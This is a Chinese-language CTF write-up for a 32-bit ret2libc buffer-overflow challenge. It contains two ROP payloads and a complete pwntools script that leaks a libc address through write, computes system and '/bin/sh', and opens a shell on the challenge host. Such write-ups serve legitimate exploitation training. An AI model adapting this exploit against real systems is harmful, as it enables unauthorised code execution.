BUUCTF 铁人三项(第五赛区)_2018_rop

还是一道ret2libc的题目
注意做题时积累32位和64位的不同处
这里由于用的是write泄露 所以write要传3个参数
记住：32位函数调用后要先将返回地址入栈 然后再依次压参数
第一次payload:

payload = 'A'*(0x88+4)
payload += p32(write_plt).decode('unicode-escape')
payload += p32(main_addr).decode('unicode-escape')
payload += p32(1).decode('unicode-escape')
payload += p32(write_got).decode('unicode-escape')
payload += p32(4).decode('unicode-escape')

第二次payload:

payload = 'A'*(0x88+4)
payload += p32(system_addr).decode('unicode-escape')
payload += p32(main_addr).decode('unicode-escape')
# payload += 'A'*4
payload += p32(bin_sh_addr).decode('unicode-escape')

注意 这里Libc要选 5一直选0 一直dump core...

完整exp:

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
elf = ELF('./pwn')
p = remote('node4.buuoj.cn',29952)
main_addr = 0x80484C6
write_plt = elf.plt['write']
write_got = elf.got['write']
ret_addr = 0x08048199

payload = 'A'*(0x88+4)
payload += p32(write_plt).decode('unicode-escape')
payload += p32(main_addr).decode('unicode-escape')
payload += p32(1).decode('unicode-escape')
payload += p32(write_got).decode('unicode-escape')
payload += p32(4).decode('unicode-escape')

p.sendline(payload)
write_addr = u32(p.recv(4).ljust(4,b'\0'))
print(hex(write_addr))

libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
system_addr = offset + libc.dump('system')
bin_sh_addr = offset + libc.dump('str_bin_sh')

payload = 'A'*(0x88+4)
payload += p32(system_addr).decode('unicode-escape')
payload += p32(ret_addr).decode('unicode-escape')
# payload += 'A'*4
payload += p32(bin_sh_addr).decode('unicode-escape')

p.sendline(payload)

p.interactive()